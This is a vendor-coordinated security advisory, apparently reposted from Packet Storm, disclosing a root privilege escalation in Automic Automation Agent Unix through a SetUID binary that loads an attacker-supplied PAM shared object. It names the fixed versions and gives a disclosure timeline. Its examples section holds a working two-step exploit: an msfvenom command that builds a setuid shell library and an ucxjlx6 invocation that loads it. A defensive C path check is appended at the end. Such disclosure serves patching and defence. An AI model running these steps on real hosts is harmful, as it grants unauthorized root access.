📄 Automic Automation Agent Unix Privilege Escalation

🗓️ 19 May 2025 00:00:00 | Reported by Flora Schaefer | Type: packetstorm | 🔗 packetstorm.news

Privilege escalation in Automic Automation Agent Unix via SetUID and PAM with an attacker-controlled shared object; update to 24.3.0 HF4 or 21.0.13 HF1.

Code
secuvera-SA-2025-01: Privilege Escalation
    
    Affected Products
       Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1
    
    References
       secuvera-SA-2025-01
       CVE not assigned yet
       CWE-426: Untrusted Search Path
       CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
    
    Summary:
       An agent configured to run in privileged mode using the SetUID bit can be used to escalate privileges by supplying an ini file with the "authentication" option set to "PAM" and the "libName" option set to a shared object file controlled by the attacker.
       The shared object will be loaded in an elevated context and can be used to execute arbitrary code as root.
    
    Effect:
       The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the vulnerable application.
    
    Examples:
       1. Generate shared object file using msfvenom
       $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
    
       2. Run the ucxjlx6 executable as follows
       $ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
    
    
    Solution:
       Update to version 24.3.0 HF4, 21.0.13 HF1 or higher
    
    Disclosure Timeline:
       2025/01/20 vulnerability discovered
       2025/01/21 vendor contacted
       2025/01/21 vendor acknowledged receipt
       2025/02/04 requested status update
       2025/02/04 provided clarification about the issue
       2025/02/11 requested status update
       2025/02/26 vendor confirmed vulnerability
       2025/03/06 requested status update
       2025/03/17 vendor provided fix and requested review
       2025/04/03 vendor retracted request for review
       2025/04/10 proposed date for public disclosure, vendor requested delay
       2025/04/16 coordinated on cvss score and recommended fix
       2025/04/28 requested status update
       2025/05/02 vendor supplied tentative date for public disclosure
       2025/05/08 requested status update
       2025/05/12 public disclosure
    
    Credits:
    Flora Schaefer
    [email protected]
    secuvera GmbH
    https://www.secuvera.de
    
    Disclaimer:
        All information is provided without warranty. The intent is to
        provide information to secure infrastructure and/or systems, not
        to be able to attack or damage. Therefore secuvera shall
        not be liable for any direct or indirect damages that might be
        caused by using this information.
    
    Kind regards
    
    Flo Schäfer
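The CWE-426 condition in the advisory comes down to a SetUID program loading a library from a path the invoking user chose. As an added defensive example (not code from the advisory and not the vendor's fix), the check below vets a configuration-supplied library path, such as the PAM `libName` value, before it would be loaded; `owner_mode_ok`, `running_elevated` and `trusted_library` are hypothetical names, and `/tmp/sh.so` is the sample path from the advisory.

```c
#define _XOPEN_SOURCE 700 /* declares realpath() under strict -std=c11 */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: root-owned and not writable by group or others. */
static int owner_mode_ok(uid_t uid, mode_t mode)
{
    return uid == 0 && (mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* 1 when the process holds more privilege than the invoking user (SetUID/SetGID). */
static int running_elevated(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Hypothetical check: 1 only if path is absolute, resolves to a regular file,
 * and the file plus every directory above it passes owner_mode_ok(). */
static int trusted_library(const char *path)
{
    char real[PATH_MAX];
    struct stat st;

    if (path == NULL || path[0] != '/' || realpath(path, real) == NULL)
        return 0;                      /* relative, missing or unresolvable */
    if (stat(real, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    for (;;) {
        if (!owner_mode_ok(st.st_uid, st.st_mode))
            return 0;                  /* someone other than root can swap it */
        if (strcmp(real, "/") == 0)
            return 1;                  /* whole chain up to / is root-controlled */
        char *slash = strrchr(real, '/');
        if (slash == real) real[1] = '\0'; else *slash = '\0';  /* go to parent */
        if (stat(real, &st) != 0)
            return 0;
    }
}

int main(int argc, char **argv)
{
    const char *lib = argc > 1 ? argv[1] : "/tmp/sh.so";  /* path from the advisory */
    printf("elevated=%d trusted=%d %s\n", running_elevated(), trusted_library(lib), lib);
    return 0;
}
```

A privileged program would refuse the load whenever `running_elevated()` is true and `trusted_library()` returns 0, and would apply the same ownership test to a user-supplied ini file itself.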
